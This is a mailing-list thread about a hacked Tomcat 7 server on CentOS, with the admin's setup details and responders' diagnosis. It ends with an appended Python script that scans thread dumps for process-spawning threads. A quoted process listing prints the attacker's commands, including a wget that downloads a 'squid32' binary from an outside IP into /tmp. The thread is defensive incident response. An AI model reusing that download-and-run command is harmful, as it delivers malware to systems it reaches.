Hello list,

well my homework is done

Here are the links:

setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij

Note that logsfiles are not the log files themselves but only an ls -lah (just
for you to see the log sizes)

A little more about the infrastructure I've mounted; I'll do some ASCII art.


internet ---> FW --> nat --> Haproxy(1) --> Apache(2) --> mod_jk(3) -->
Haproxy(4) --> Tomcat7(5) --> haproxy(6) --> Tomcat(7)


Apache(2) is serving static content, so haproxy(1) at the first level does
HTTP round robin balancing.
Apache(2) connects to tomcat(5) through haproxy(4) (using an L4 connection)
using mod_jk(3).
Tomcat(5) is the main app server (the one that got intruded), which uses
tomcat(7) (Solr service) through haproxy(6) over an L4 connection.

Versions:

Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41

[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit

[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#

For now I haven't seen that the squid process was launched, so I couldn't do a
dump.

Let me know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours




Regards.-
Leonardo Santagostini

<http://ar.linkedin.com/in/santagostini>





2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:

> OK, I will do the following:
>
> 1) thread dump of running tomcat instance
> 2) Pastebin the running tomcat config
>
> I think by midday I will have all the info.
>
> Thanks all for replying to me and for all the responses.
>
> Regards, Leonardo
>
> Regards.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> ch...@christopherschultz.net>:
>
>>
>> Konstantin,
>>
>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>> > <lsantagost...@gmail.com>:
>> >> Hello Dan,
>> >>
>> >> Nope, the attacker is executing locally the following
>> >>
>> >> tomcat    8882     1  0 Apr27 ?        00:00:00 sh /tmp/4.sh
>> >> tomcat    8893  8882  0 Apr27 ?        00:00:00 wget
>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> >>
>> >> And then launches squid, which tries to connect via SSH to various
>> >> places.
>> >>
>> >> Right now it's time to leave the office, but in a few hours I will
>> >> paste in pastebin the access logs, config files, whatever you tell
>> >> me.
>> >>
>> >> This is my pstree
>> >>
>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
>> >> init─┬─atd
>> >>      ├─java─┬─sh───wget
>> >>      │      └─263*[{java}]
>> >
>> > sh launched by tomcat's java?
>>
>> Yes: please verify that it's the JVM running Tomcat, and not just any
>> JVM process.
>>
>> > Take a thread dump:
>> >
>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>> >
>> >  It shall show the stack trace of the thread that launched the external
>> > process.
>>
>> +1
>>
>> The only things that ship with Tomcat that call Process.exec() are the
>> CGI servlet and SSI, both of which are disabled by default. So, either
>> you have an insecure CGI/SSI configuration, your web application has a
>> vulnerability, or you have deployed something like the Manager
>> application and improperly secured it.
>>
>> A classic example of such an intrusion might be that someone got a
>> foothold elsewhere into your network, and the Manager web application
>> is not properly secured with a password, etc.
>>
>> -chris
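The thread-dump advice above (find the thread whose stack shows it launching an external process, then read off which Tomcat component or webapp class called exec) can be automated over a saved jstack / kill -3 dump. The script below is an added example written for this thread, not code from the Tomcat project or from anyone in the discussion. The thread dump it parses is constructed: the JDK frames (java.lang.UNIXProcess, ProcessImpl, ProcessBuilder, Runtime.exec) and the Tomcat CGIServlet frames are real class names, but the line numbers, thread ids and the com.example.webapp.ShellServlet class are made up for illustration.

```python
import re
from typing import Dict, List

# Frames that mean "this thread is in the middle of spawning an OS process".
# Real JDK class names; on Java 6 the native fork appears as
# java.lang.UNIXProcess.forkAndExec, reached via ProcessImpl/ProcessBuilder.
PROCESS_SPAWN_FRAMES = (
    "java.lang.UNIXProcess.",
    "java.lang.ProcessImpl.",
    "java.lang.ProcessBuilder.start",
    "java.lang.Runtime.exec",
)

# JDK packages to skip when walking down the stack to the first frame that
# belongs to Tomcat itself or to a deployed web application.
JDK_PREFIXES = ("java.", "javax.", "sun.", "com.sun.")

THREAD_HEADER = re.compile(r'^"(?P<name>[^"]+)"')
FRAME_LINE = re.compile(r'^\s+at\s+(?P<frame>\S+)\(')


def parse_thread_dump(text: str) -> Dict[str, List[str]]:
    """Return {thread name: [frames, innermost first]} for a HotSpot-style dump."""
    threads: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        header = THREAD_HEADER.match(line)
        if header:
            current = header.group("name")
            threads[current] = []
            continue
        frame = FRAME_LINE.match(line)
        if frame and current is not None:
            threads[current].append(frame.group("frame"))
    return threads


def find_process_spawners(text: str) -> Dict[str, str]:
    """Map each thread currently spawning a process to the first non-JDK frame
    below the spawn, i.e. the Tomcat component or webapp class that called exec()."""
    hits: Dict[str, str] = {}
    for name, frames in parse_thread_dump(text).items():
        if not any(f.startswith(PROCESS_SPAWN_FRAMES) for f in frames):
            continue
        caller = next((f for f in frames if not f.startswith(JDK_PREFIXES)),
                      "<no non-JDK frame>")
        hits[name] = caller
    return hits


# Constructed sample dump (not a real capture): one worker spawning a process
# from a hypothetical webapp servlet, one spawning from Tomcat's CGI servlet,
# and two threads that are doing nothing suspicious.
SAMPLE_DUMP = '''\
Full thread dump Java HotSpot(TM) 64-Bit Server VM (20.14-b01 mixed mode):

"http-bio-8080-exec-7" daemon prio=10 tid=0x00007f10 nid=0x22b2 runnable [0x00007f1000]
   java.lang.Thread.State: RUNNABLE
    at java.lang.UNIXProcess.forkAndExec(Native Method)
    at java.lang.UNIXProcess.<init>(UNIXProcess.java:135)
    at java.lang.ProcessImpl.start(ProcessImpl.java:130)
    at java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)
    at java.lang.Runtime.exec(Runtime.java:615)
    at com.example.webapp.ShellServlet.doPost(ShellServlet.java:42)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:646)
    at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
    at java.lang.Thread.run(Thread.java:662)

"http-bio-8080-exec-2" daemon prio=10 tid=0x00007f11 nid=0x22ad waiting on condition [0x00007f1100]
   java.lang.Thread.State: WAITING (parking)
    at sun.misc.Unsafe.park(Native Method)
    at org.apache.tomcat.util.threads.TaskQueue.take(TaskQueue.java:104)
    at java.lang.Thread.run(Thread.java:662)

"http-bio-8080-exec-4" daemon prio=10 tid=0x00007f12 nid=0x22b0 runnable [0x00007f1200]
   java.lang.Thread.State: RUNNABLE
    at java.lang.UNIXProcess.forkAndExec(Native Method)
    at java.lang.ProcessImpl.start(ProcessImpl.java:130)
    at java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)
    at org.apache.catalina.servlets.CGIServlet$CGIRunner.run(CGIServlet.java:1456)
    at org.apache.catalina.servlets.CGIServlet.doGet(CGIServlet.java:497)
    at javax.servlet.http.HttpServlet.service(HttpServlet.java:621)
    at java.lang.Thread.run(Thread.java:662)

"GC Daemon" daemon prio=10 tid=0x00007f13 nid=0x22a0 in Object.wait() [0x00007f1300]
   java.lang.Thread.State: TIMED_WAITING (on object monitor)
    at java.lang.Object.wait(Native Method)
    at sun.misc.GC$Daemon.run(GC.java:100)
'''

if __name__ == "__main__":
    for thread, caller in find_process_spawners(SAMPLE_DUMP).items():
        print(f"{thread}: process spawned from {caller}")
```

Run it against a real dump with the sample replaced by the file contents (for example open(path).read()). A dump only shows threads that are inside exec() at the moment it is taken, so a one-off spawn such as the "sh /tmp/4.sh" from April 27 will not be visible days later unless the worker is still blocked reading the child's output or the spawn is being repeated; taking several dumps a few seconds apart, or while the attacker's request is being replayed from the access logs, raises the chance of catching the calling frame.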
